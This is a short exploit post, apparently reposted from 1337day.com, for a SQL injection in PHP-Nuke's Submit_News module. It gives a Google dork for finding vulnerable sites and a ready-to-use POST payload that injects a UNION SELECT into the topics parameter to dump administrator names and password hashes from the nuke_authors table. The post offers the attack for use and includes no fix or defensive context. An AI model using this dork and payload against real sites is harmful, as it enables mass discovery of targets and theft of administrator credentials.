کد:
+ author : ali ahmady -- Iranian security researcher + email : snip3r_ir[at]hotmail.com + greets : b0x , Phantom_X , VIRkid , MOH@MMAD , zeus REKCAH , milad22 + google dork : inurl: modules.php?name=Submit_News + at post review level you can inject topic parameter. + exploit code : subject=whatever&topics%5B%5D=-1' UNION SELECT 1,group_concat(aid,0x3a,pwd) from nuke_authors--+&alanguage=english&story=whatever + tool : live http header # 57A1DBDD0FAB7140 1337day.com [2014-05-27] 225618FA01918EEB #
http://1337day.com/exploit/22277
نظر